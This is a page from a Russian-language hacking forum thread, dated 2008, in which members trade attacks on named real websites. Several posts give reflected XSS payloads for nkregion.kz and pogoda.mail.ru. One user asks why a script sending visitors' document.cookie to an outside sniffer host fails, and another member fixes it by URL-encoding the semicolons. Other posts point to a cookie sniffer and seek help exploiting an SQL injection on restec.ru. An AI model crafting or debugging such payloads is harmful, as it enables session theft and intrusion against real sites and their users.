HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 119 из 2422 « Первая < 1969109 115 116 117 118 119 120 121 122 123 1291692196191119 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.03.2008, 19:04
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию
2 truelamer
на сайте есть намек на ХСС и даже возможно актив (хотя тут как посмотреть)
http://nkregion.kz/board/index.php?fid=3&id=18252
Кликни на "Отправить письмо автору" там откроется окошко в котором ник, половина его нормальная а половина уже после тега курсив. Дальше не рыл.... просто не успел
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Red_Red1; 12.03.2008 в 19:07..
 
Ответить с цитированием

  #2  
Старый 12.03.2008, 19:23
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
2 truelamer
http://nkregion.kz/board/index.php?fid=19КОД&id=52356

КОД '></title><SCRIPT>alert(/blabla/)</SCRIPT>


Блин, опера аж зависла никсовая от такого запроса (я серьёзно)
Последний раз редактировалось xcedz; 12.03.2008 в 19:39..
 
Ответить с цитированием

  #3  
Старый 13.03.2008, 14:07
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
По умолчанию
delete
Последний раз редактировалось tick; 14.03.2008 в 05:44..
 
Ответить с цитированием

  #4  
Старый 13.03.2008, 14:15
Lesnoy_chelovek
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
С нами: 10226273

Репутация: 370
По умолчанию
Сниффер используй для перехвата данных.
Можешь использовать этот сниффер: http://system32.name/sniff/log.php
 
Ответить с цитированием

  #5  
Старый 14.03.2008, 02:16
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
http://pogoda.mail.ru/?city=1301"><script>alert(document.cookie)</script>&extended=1

Простите, если боян))))
Работает и в Опере и в ИЕ)))
Но через сниффер не хочет передовать данные(( Почему?
Запрос подаю так: http://pogoda.mail.ru/?city=1301"><script>img = new Image(); img.src = "http://s.netsec.ru/plum.gif?"+document.cookie;</script>&extended=1

http://s.netsec.ru/plum.gif - Ссылка проверяна... просто так работает... А предовать дынные через mail не хочет((
 
Ответить с цитированием

  #6  
Старый 14.03.2008, 06:11
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
>> Что посоветуете?

Посоветую тебе не заёбывать людей логами с какого то сканера, а идти и почитать нормальные мануалы.
__________________
..
 
Ответить с цитированием

  #7  
Старый 14.03.2008, 14:50
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
http://pogoda.mail.ru/?city=1301"><script>alert(document.cookie)</script>&extended=1

Простите, если боян))))
Работает и в Опере и в ИЕ)))
Но через сниффер не хочет передовать данные(( Почему?
Запрос подаю так: http://pogoda.mail.ru/?city=1301"><script>img = new Image(); img.src = "http://s.netsec.ru/plum.gif?"+document.cookie;</script>&extended=1

http://s.netsec.ru/plum.gif - Ссылка проверяна... просто так работает... А предовать дынные через mail не хочет((
 
Ответить с цитированием

  #8  
Старый 14.03.2008, 16:46
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
2Tigger вот твоя проблема скажи честно ты в код страницы хоть заглядывал ?

Код:
a href="/?city=1301"><script>img = new Image(fuck)"><img src="/img/prjlogo_weather.gif" width=80
фильтр как видно отсюда проглатывает все что после ";" и закрывает тег а алет у тебя работал по тому что там ";" нету попробуй так
Код:
http://pogoda.mail.ru/?city=1301"><script>img = new Image()%3B img.src = "http://s.netsec.ru/plum.gif?"+document.cookie%3B </script>&extended=1
Последний раз редактировалось MaSter GeN; 14.03.2008 в 17:16..
 
Ответить с цитированием

  #9  
Старый 14.03.2008, 17:25
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами: 10137645

Репутация: 82
По умолчанию
Помогите с проблемкой !
Вот есть сатик нашел SQL inj, но не могу подобрать таблицу может кто поможет
_http://www.restec.ru/exhibitions/featured/motoshow/getstand.ru.html?exhibs=-811+union+select+1/*
+ еще если не ошибаюсь есть PHP Inj, как это можно использовать ?
http://www.restec.ru/exhibitions/featured/motoshow/img/page.ru.html?http://www.sciam.com/media/inline/B3421824-EB0D-566A-0A231B2465213E50_1.jpg

Поправьте если где не прав ?

Заранее спасибо!
 
Ответить с цитированием

  #10  
Старый 14.03.2008, 19:35
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию
Snap, php-inj там нет имхо
 
Ответить с цитированием
Ответ
Страница 119 из 2422 « Первая < 1969109 115 116 117 118 119 120 121 122 123 1291692196191119 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.